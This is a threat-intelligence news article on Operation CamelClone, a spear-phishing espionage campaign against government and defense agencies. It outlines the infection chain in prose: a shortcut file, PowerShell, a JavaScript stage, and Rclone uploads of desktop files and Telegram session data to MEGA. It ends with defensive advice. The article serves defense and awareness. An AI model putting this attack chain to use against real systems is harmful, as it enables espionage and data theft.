CamelClone Spy Campaign - Targeting Governments Worldwide
Basically, a spy group is tricking government workers into downloading harmful files to steal sensitive information.
A new spy campaign, Operation CamelClone, is targeting government agencies globally. Using spear-phishing tactics, attackers aim to steal sensitive data. Organizations must enhance their security measures to mitigate this threat.
The Threat
Operation CamelClone is a sophisticated espionage campaign that has emerged as a significant threat to government agencies and defense institutions across various countries. The campaign has been active since late February 2026, targeting nations like Algeria, Mongolia, Ukraine, and Kuwait. The attackers use spear-phishing emails that contain malicious ZIP files disguised as official government correspondence. This tactic is particularly concerning as it exploits the trust that individuals have in official communications.
The campaign's first notable incident involved a ZIP file mimicking Algeria’s Ministry of Housing, which was uploaded to VirusTotal. As the operation progressed, additional samples were identified, each cleverly themed to resonate with the targeted nation’s interests. For example, one email referenced cooperation with China, while another focused on defense procurement for Kuwait’s Air Force. This careful selection of targets indicates that the attackers are motivated by intelligence gathering rather than financial gain.
Who's Behind It
The attackers behind Operation CamelClone remain anonymous, but their methods reveal a high level of sophistication. They utilize a multi-stage infection chain that begins with a Windows shortcut file embedded in the malicious ZIP archive. Once the victim opens this file, a PowerShell command executes in the background, pulling additional malicious payloads from a public file-sharing platform. This technique allows them to avoid detection by traditional security measures, as they do not rely on dedicated command-and-control servers.
By hosting their malicious content on platforms like filebulldogs[.]com and routing stolen data through MEGA cloud storage, they effectively blend their activities with normal internet traffic. This makes it challenging for organizations to monitor and identify suspicious behavior, further complicating defense efforts.
Tactics & Techniques
The infection process initiated by the CamelClone campaign is intricate. After the initial PowerShell command runs, it downloads a JavaScript file named f.js, which executes further malicious actions. This includes downloading a decoy PDF to distract the victim while simultaneously uploading sensitive files from the victim’s system to the attacker’s MEGA account.
The use of Rclone, a legitimate cloud file transfer tool, is particularly alarming. The attackers leverage this tool to sweep the victim’s Desktop for documents and even target Telegram session data, potentially exposing private conversations. The attackers have registered multiple MEGA accounts to facilitate their operations, indicating a well-planned strategy to maintain anonymity.
Defensive Measures
Organizations, especially those in government and defense sectors, must take proactive measures against such sophisticated attacks. Caution is key when dealing with unsolicited ZIP files, particularly those that reference official institutions. Implementing strict access controls to anonymous file-sharing platforms can significantly reduce exposure.
Additionally, monitoring outbound traffic to cloud storage services like MEGA is crucial. Employing behavior-based endpoint detection tools can help identify and stop the execution of malicious scripts before they can complete their objectives. By remaining vigilant and informed, organizations can better protect themselves against the evolving landscape of cyber espionage.